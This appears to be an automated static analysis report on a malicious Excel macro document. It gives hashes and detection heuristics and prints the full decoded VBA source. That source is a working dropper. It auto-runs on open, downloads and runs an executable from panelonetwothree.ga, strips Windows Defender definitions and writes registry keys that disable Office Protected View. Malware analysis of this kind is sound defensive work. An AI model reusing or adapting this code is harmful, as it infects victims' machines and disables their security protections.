Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 f9f21266edfe98f0…

MALICIOUS

Office (OOXML)

Size: 19.1 KB
Created: 2015-06-05 18:17:20 UTC
Authoring application: Microsoft Excel 16.0300
First seen: 2021-02-23
MD5: 91d3b798f050eed56b42bc64b3157860
SHA-1: 0802abef2f6ffcbd9526db88a8ef93764c471025
SHA-256: f9f21266edfe98f0cbf881e8c06a2561ad2edf0a41bce5f2fa092abeedd93f1b
Risk Score: 332

Heuristics 9

  • ClamAV: Doc.Dropper.Agent-6412232-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6412232-1
  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    Set AlWhaWu8AmxahJAs = CreateObject(zIiEvHzx0("\Xhwnuy3Xmjqq", "5"))
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set AlWhaWu8AmxahJAs = CreateObject(zIiEvHzx0("\Xhwnuy3Xmjqq", "5"))
  • cmd.exe reference in VBA high OLE_VBA_CMD
    cmd.exe reference in VBA
    Matched line in script
    BypassWindowsDefender2 = ("cmd /c cd ""%ProgramFiles%\Windows Defender"" & MpCmdRun.exe -removedefinitions -dynamicsignatures & exit")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Private Sub Workbook_Open()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://panelonetwothree.ga/work/3.exe In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 12451 bytes
SHA-256: c4e648202669c99769a5dbcc127eb43cb0f1d0b7f2b0117a254bbc1183f3e59d
Detection
ClamAV: No threats found
Obfuscation or payload: likely
83 of 162 identifiers look randomly generated (e.g. 'KNFX_Vriwzduh_Plfurvriw_Riilfh_4513_Srzh') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Sub asdasd()

End Sub

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
Set AlWhaWu8AmxahJAs = CreateObject(zIiEvHzx0("\Xhwnuy3Xmjqq", "5"))
Dim Al89AwnAmxahJAs1
Dim Al89AwnAmxahJAs2
Dim Al89AwnAmxahJAs3
Dim Al89AwnAmxahJAs4
Dim Al89AwnAmxahJAs5
Dim Al89AwnAmxahJAs6
Dim Al89AwnAmxahJAs7
Dim Al89AwnAmxahJAs8
Dim Al89AwnAmxahJAs9
Dim Al89AwnAmxahJAs010
Dim Al89AwnAmxahJAs011
Dim Al89AwnAmxahJAs012
Dim Al89AwnAmxahJAs013
Dim Al89AwnAmxahJAs014
Al89AwnAmxahJAs1 = zIiEvHzx0("Ts{ivWlip", "4")
Al89AwnAmxahJAs2 = zIiEvHzx0("o#+Qhz0Re", "3")
Al89AwnAmxahJAs3 = zIiEvHzx0("pkiz&Y yz", "6")
Al89AwnAmxahJAs4 = zIiEvHzx0("mu6Vm|6_m", "8")
Al89AwnAmxahJAs5 = zIiEvHzx0("eFolhqw,1", "3")
Al89AwnAmxahJAs6 = zIiEvHzx0("GrzqordgI", "3")
Al89AwnAmxahJAs7 = "ile('http://panelonetwothree.ga/work/3.exe',"
Al89AwnAmxahJAs8 = zIiEvHzx0("0.Y~kurl.e|", "9")
Al89AwnAmxahJAs9 = zIiEvHzx0("{hmtxy873", "5")
Al89AwnAmxahJAs010 = zIiEvHzx0("l l.0BZ", "7")
Al89AwnAmxahJAs011 = zIiEvHzx0("}j{}6Y{", "9")
Al89AwnAmxahJAs012 = zIiEvHzx0("rfhvv#*(", "3")
Al89AwnAmxahJAs013 = zIiEvHzx0("Sxeolf(_vy", "3")
Al89AwnAmxahJAs014 = zIiEvHzx0("glswx762i|i+", "4")
    
Al89AwnAmxahJAs20 = Al89AwnAmxahJAs1 + Al89AwnAmxahJAs2 + Al89AwnAmxahJAs3 + Al89AwnAmxahJAs4 + Al89AwnAmxahJAs5 + Al89AwnAmxahJAs6 + Al89AwnAmxahJAs7 + Al89AwnAmxahJAs8 + Al89AwnAmxahJAs9 + Al89AwnAmxahJAs010 + Al89AwnAmxahJAs011 + Al89AwnAmxahJAs012 + Al89AwnAmxahJAs013 + Al89AwnAmxahJAs014
AlWhaWu8AmxahJAs.Run Al89AwnAmxahJAs20, vbHide
Set tskkill = CreateObject(zIiEvHzx0("\Xhwnuy3Xmjqq", "5"))
Dim STArTkwZkill
STArTkwZkill = zIiEvHzx0("dne!0d!ubtlljmm!0g!0jn!xjoxpse/fyf!'!fyju!", "1")
tskkill.Run STArTkwZkill, vbHide
Set tskkillword = CreateObject(zIiEvHzx0("\Xhwnuy3Xmjqq", "5"))
Dim STArTkwZkillword
STArTkwZkillword = zIiEvHzx0("Wv~lyzolss'4^pukv~Z{€sl'Opkklu'{hzrrpss'6m'6pt'L jls5l l", "7")
tskkillword.Run STArTkwZkillword, vbHide
Set BypassWindows = CreateObject(zIiEvHzx0("\Xhwnuy3Xmjqq", "5"))
Dim BypassWindowsDefender
BypassWindowsDefender = zIiEvHzx0("gqh$3g$tmrk$1r$7$psgeplswx$*$mtgsrjmk3vipiewi$*$mtgsrjmk3vipiewi$*$mtgsrjmk3vipiewi$*$tmrk$1r$7$psgeplswx$*$tmrk$1r$7$psgeplswx$*$i|mx", "4")
Set BypassWindows2 = CreateObject(zIiEvHzx0("\Xhwnuy3Xmjqq", "5"))
Dim BypassWindowsDefender2
BypassWindowsDefender2 = ("cmd /c cd ""%ProgramFiles%\Windows Defender"" & MpCmdRun.exe -removedefinitions -dynamicsignatures & exit")
BypassWindows2.Run BypassWindowsDefender2, vbHide
Set wso = CreateObject(zIiEvHzx0("\Xhwnuy3Xmjqq", "5"))
wso.RegWrite zIiEvHzx0("JMEW^Uqhvyctg^Oketquqhv^Qhhkeg^3302^Yqtf^Ugewtkv{^XDCYctpkpiu", "2"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("NQI[bYulz}gxkbSoixuyulzbUlloikb7846b]uxjbYki{xoz b\HG]gxtotmy", "6"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("NQI[bYulz}gxkbSoixuyulzbUlloikb7:46b]uxjbYki{xoz b\HG]gxtotmy", "6"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("JMEW^Uqhvyctg^Oketquqhv^Qhhkeg^3702^Yqtf^Ugewtkv{^XDCYctpkpiu", "2"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("NQI[bYulz}gxkbSoixuyulzbUlloikb7<46b]uxjbYki{xoz b\HG]gxtotmy", "6"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("QTL^e\xo}€j{neVrl{x|xo}eXoorlne::79eYx€n{Yxrw}e\nl~{r}‚e_KJ`j{wrwp|", "9"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("QTL^e\xo}€j{neVrl{x|xo}eXoorlne:;79eYx€n{Yxrw}e\nl~{r}‚e_KJ`j{wrwp|", "9"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("KNFX_Vriwzduh_Plfurvriw_Riilfh_4713_SrzhuSrlqw_Vhfxulw|_YEDZduqlqjv", "3"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("ILDV]Tpguxbsf]Njdsptpgu]Pggjdf]26/1]QpxfsQpjou]Tfdvsjuz]WCBXbsojoht", "1"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("JMEW^Uqhvyctg^Oketquqhv^Qhhkeg^3802^RqygtRqkpv^Ugewtkv{^XDCYctpkpiu", "2"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("ILDV]Tpguxbsf]Njdsptpgu]Pggjdf]22/1]Fydfm]Tfdvsjuz]WCBXbsojoht", "1"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("JMEW^Uqhvyctg^Oketquqhv^Qhhkeg^3402^Gzegn^Ugewtkv{^XDCYctpkpiu", "2"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("PSK]d[wn| izmdUqkzw{wn|dWnnqkmd9<68dM€kmtd[mk}zq|�d^JI_izvqvo{", "8"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("ORJ\cZvm{~hylcTpjyvzvm{cVmmpjlc8<57cL jlscZlj|yp{€c]IH^hyupunz", "7"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("LOGY`Wsjx{evi`Qmgvswsjx`Sjjmgi`5:24`I|gip`Wigyvmx}`ZFE[evrmrkw", "4"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("ILDV]Tpguxbsf]Njdsptpgu]Pggjdf]22/1]Xpse]Tfdvsjuz]QspufdufeWjfx]EjtbcmfJoufsofuGjmftJoQW", "1"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("ORJ\cZvm{~hylcTpjyvzvm{cVmmpjlc8857c^vykcZlj|yp{€cWyv{lj{lk]pl~cKpzhislH{{hjoltlu{zPuW]", "7"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("ILDV]Tpguxbsf]Njdsptpgu]Pggjdf]22/1]Xpse]Tfdvsjuz]QspufdufeWjfx]EjtbcmfVotbgfMpdbujpotJoQW", "1"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("PSK]d[wn| izmdUqkzw{wn|dWnnqkmd9968dXw mzXwqv|d[mk}zq|�dXzw|mk|ml^qm dLq{ijtmQv|mzvm|Nqtm{QvX^", "8"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("QTL^e\xo}€j{neVrl{x|xo}eXoorlne::79eYx€n{Yxrw}e\nl~{r}‚eY{x}nl}nm_rn€eMr|jkunJ}}jlqnvnw}|RwY_", "9"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("KNFX_Vriwzduh_Plfurvriw_Riilfh_4413_SrzhuSrlqw_Vhfxulw|_SurwhfwhgYlhz_GlvdeohXqvdihOrfdwlrqvLqSY", "3"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("KNFX_Vriwzduh_Plfurvriw_Riilfh_4413_H{fho_Vhfxulw|_SurwhfwhgYlhz_GlvdeohLqwhuqhwIlohvLqSY", "3"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("LOGY`Wsjx{evi`Qmgvswsjx`Sjjmgi`5524`I|gip`Wigyvmx}`TvsxigxihZmi{`HmwefpiExxegliqirxwMrTZ", "4"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("ORJ\cZvm{~hylcTpjyvzvm{cVmmpjlc8857cL jlscZlj|yp{€cWyv{lj{lk]pl~cKpzhisl\uzhmlSvjh{pvuzPuW]", "7"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("MPHZaXtky|fwjaRnhwtxtkyaTkknhja6735a\twiaXjhzwny~aUwtyjhyji[nj|aInxfgqjNsyjwsjyKnqjxNsU[", "5"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("NQI[bYulz}gxkbSoixuyulzbUlloikb7846b]uxjbYki{xoz bVxuzkizkj\ok}bJoyghrkGzzginksktzyOtV\", "6"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("MPHZaXtky|fwjaRnhwtxtkyaTkknhja6735a\twiaXjhzwny~aUwtyjhyji[nj|aInxfgqjZsxfkjQthfyntsxNsU[", "5"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("ORJ\cZvm{~hylcTpjyvzvm{cVmmpjlc8957cWv~lyWvpu{cZlj|yp{€cWyv{lj{lk]pl~cKpzhislPu{lyul{MpslzPuW]", "7"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("KNFX_Vriwzduh_Plfurvriw_Riilfh_4513_SrzhuSrlqw_Vhfxulw|_SurwhfwhgYlhz_GlvdeohDwwdfkhphqwvLqSY", "3"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("LOGY`Wsjx{evi`Qmgvswsjx`Sjjmgi`5624`Ts{ivTsmrx`Wigyvmx}`TvsxigxihZmi{`HmwefpiYrwejiPsgexmsrwMrTZ", "4"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("ILDV]Tpguxbsf]Njdsptpgu]Pggjdf]23/1]Fydfm]Tfdvsjuz]QspufdufeWjfx]EjtbcmfJoufsofuGjmftJoQW", "1"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("MPHZaXtky|fwjaRnhwtxtkyaTkknhja6735aJ}hjqaXjhzwny~aUwtyjhyji[nj|aInxfgqjFyyfhmjrjsyxNsU[", "5"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("QTL^e\xo}€j{neVrl{x|xo}eXoorlne:;79eN�lnue\nl~{r}‚eY{x}nl}nm_rn€eMr|jkun^w|jonUxlj}rxw|RwY_", "9"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("ILDV]Tpguxbsf]Njdsptpgu]Pggjdf]25/1]Xpse]Tfdvsjuz]QspufdufeWjfx]EjtbcmfJoufsofuGjmftJoQW", "1"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("PSK]d[wn| izmdUqkzw{wn|dWnnqkmd9<68d_wzld[mk}zq|�dXzw|mk|ml^qm dLq{ijtmI||ikpmumv|{QvX^", "8"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("ORJ\cZvm{~hylcTpjyvzvm{cVmmpjlc8;57c^vykcZlj|yp{€cWyv{lj{lk]pl~cKpzhisl\uzhmlSvjh{pvuzPuW]", "7"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("JMEW^Uqhvyctg^Oketquqhv^Qhhkeg^3602^RqygtRqkpv^Ugewtkv{^RtqvgevgfXkgy^FkucdngKpvgtpgvHknguKpRX", "2"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("KNFX_Vriwzduh_Plfurvriw_Riilfh_4713_SrzhuSrlqw_Vhfxulw|_SurwhfwhgYlhz_GlvdeohDwwdfkhphqwvLqSY", "3"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("JMEW^Uqhvyctg^Oketquqhv^Qhhkeg^3602^RqygtRqkpv^Ugewtkv{^RtqvgevgfXkgy^FkucdngWpuchgNqecvkqpuKpRX", "2"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("JMEW^Uqhvyctg^Oketquqhv^Qhhkeg^3602^Gzegn^Ugewtkv{^RtqvgevgfXkgy^FkucdngKpvgtpgvHknguKpRX", "2"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("NQI[bYulz}gxkbSoixuyulzbUlloikb7:46bK~ikrbYki{xoz bVxuzkizkj\ok}bJoyghrkGzzginksktzyOtV\", "6"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("KNFX_Vriwzduh_Plfurvriw_Riilfh_4713_H{fho_Vhfxulw|_SurwhfwhgYlhz_GlvdeohXqvdihOrfdwlrqvLqSY", "3"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("ORJ\cZvm{~hylcTpjyvzvm{cVmmpjlc8<57c^vykcZlj|yp{€cWyv{lj{lk]pl~cKpzhislPu{lyul{MpslzPuW]", "7"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("PSK]d[wn| izmdUqkzw{wn|dWnnqkmd9=68d_wzld[mk}zq|�dXzw|mk|ml^qm dLq{ijtmI||ikpmumv|{QvX^", "8"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("ILDV]Tpguxbsf]Njdsptpgu]Pggjdf]26/1]Xpse]Tfdvsjuz]QspufdufeWjfx]EjtbcmfVotbgfMpdbujpotJoQW", "1"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("NQI[bYulz}gxkbSoixuyulzbUlloikb7;46bVu}kxVuotzbYki{xoz bVxuzkizkj\ok}bJoyghrkOtzkxtkzLorkyOtV\", "6"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("NQI[bYulz}gxkbSoixuyulzbUlloikb7;46bVu}kxVuotzbYki{xoz bVxuzkizkj\ok}bJoyghrkGzzginksktzyOtV\", "6"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("NQI[bYulz}gxkbSoixuyulzbUlloikb7;46bVu}kxVuotzbYki{xoz bVxuzkizkj\ok}bJoyghrk[tyglkRuigzoutyOtV\", "6"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("JMEW^Uqhvyctg^Oketquqhv^Qhhkeg^3702^Gzegn^Ugewtkv{^RtqvgevgfXkgy^FkucdngKpvgtpgvHknguKpRX", "2"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("ILDV]Tpguxbsf]Njdsptpgu]Pggjdf]26/1]Fydfm]Tfdvsjuz]QspufdufeWjfx]EjtbcmfBuubdifnfoutJoQW", "1"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("LOGY`Wsjx{evi`Qmgvswsjx`Sjjmgi`5924`I|gip`Wigyvmx}`TvsxigxihZmi{`HmwefpiYrwejiPsgexmsrwMrTZ", "4"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("KNFX_Vriwzduh_Plfurvriw_Riilfh_4913_Zrug_Vhfxulw|_SurwhfwhgYlhz_GlvdeohLqwhuqhwIlohvLqSY", "3"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("LOGY`Wsjx{evi`Qmgvswsjx`Sjjmgi`5:24`[svh`Wigyvmx}`TvsxigxihZmi{`HmwefpiExxegliqirxwMrTZ", "4"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("PSK]d[wn| izmdUqkzw{wn|dWnnqkmd9>68d_wzld[mk}zq|�dXzw|mk|ml^qm dLq{ijtm]v{inmTwki|qwv{QvX^", "8"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("LOGY`Wsjx{evi`Qmgvswsjx`Sjjmgi`5:24`Ts{ivTsmrx`Wigyvmx}`TvsxigxihZmi{`HmwefpiMrxivrixJmpiwMrTZ", "4"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("NQI[bYulz}gxkbSoixuyulzbUlloikb7<46bVu}kxVuotzbYki{xoz bVxuzkizkj\ok}bJoyghrkGzzginksktzyOtV\", "6"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("PSK]d[wn| izmdUqkzw{wn|dWnnqkmd9>68dXw mzXwqv|d[mk}zq|�dXzw|mk|ml^qm dLq{ijtm]v{inmTwki|qwv{QvX^", "8"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("KNFX_Vriwzduh_Plfurvriw_Riilfh_4913_H{fho_Vhfxulw|_SurwhfwhgYlhz_GlvdeohLqwhuqhwIlohvLqSY", "3"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("ORJ\cZvm{~hylcTpjyvzvm{cVmmpjlc8=57cL jlscZlj|yp{€cWyv{lj{lk]pl~cKpzhislH{{hjoltlu{zPuW]", "7"), 1, zIiEvHzx0("SFH`EXPSE", "1")
wso.RegWrite zIiEvHzx0("MPHZaXtky|fwjaRnhwtxtkyaTkknhja6;35aJ}hjqaXjhzwny~aUwtyjhyji[nj|aInxfgqjZsxfkjQthfyntsxNsU[", "5"), 1, zIiEvHzx0("SFH`EXPSE", "1")
End Sub
Public Function zIiEvHzx0(KJDd77SzX As String, kaLvjMVfL As Integer)
    Dim ZNSffcTRJ As Integer
    For ZNSffcTRJ = 1 To Len(KJDd77SzX)
        Mid(KJDd77SzX, ZNSffcTRJ, 1) = Chr(Asc(Mid(KJDd77SzX, ZNSffcTRJ, 1)) - kaLvjMVfL)
    Next ZNSffcTRJ
    zIiEvHzx0 = KJDd77SzX
End Function



Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 31232 bytes
SHA-256: 4f6a2986555fd5e413940c10827215e02e1da34afff2d2f82c1807e1649cc898
Detection
ClamAV: Doc.Dropper.Agent-6412232-1
Obfuscation or payload: likely
176 of 343 identifiers look randomly generated (e.g. 'KNFX_Vriwzduh_Plfurvriw_Riilfh_4413_Srzh') — consistent with name-mangling obfuscation.